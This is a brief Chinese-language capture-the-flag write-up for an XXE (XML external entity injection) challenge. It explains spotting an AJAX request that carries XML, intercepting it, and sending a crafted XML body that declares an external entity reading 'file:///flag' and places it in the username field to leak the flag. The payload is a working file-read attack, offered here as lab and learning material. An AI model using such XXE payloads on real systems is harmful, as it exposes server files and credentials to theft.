考点:XXE(XML External Entity Injection 即XML外部实体注入)
1.界面
随便填入信息,进行抓包
2.分析请求头,
有x-requests-with,可以知道请求是ajax请求(ajax 全名 async javascript and XML(异步JavaScript和XML))也就是通过xml进行数据传输
https://xz.aliyun.com/t/6887#toc-0
抓包更改xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
得到flag